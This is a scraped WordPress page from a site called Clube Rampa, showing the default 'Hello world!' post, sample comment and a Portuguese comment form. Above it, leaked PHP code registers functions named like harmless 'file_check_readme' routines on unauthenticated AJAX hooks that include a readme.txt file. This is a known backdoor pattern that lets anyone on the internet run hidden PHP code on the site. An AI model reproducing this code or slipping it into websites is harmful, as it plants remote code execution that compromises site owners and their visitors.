if(!function_exists('file_check_readme12796')){ add_action('wp_ajax_nopriv_file_check_readme12796', 'file_check_readme12796'); add_action('wp_ajax_file_check_readme12796', 'file_check_readme12796'); function file_check_readme12796() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme65457')){ add_action('wp_ajax_nopriv_file_check_readme65457', 'file_check_readme65457'); add_action('wp_ajax_file_check_readme65457', 'file_check_readme65457'); function file_check_readme65457() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Hello world! – Clube Rampa

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!


Comentários

Uma resposta para “Hello world!”

  1. Hi, this is a comment.
    To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
    Commenter avatars come from Gravatar.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *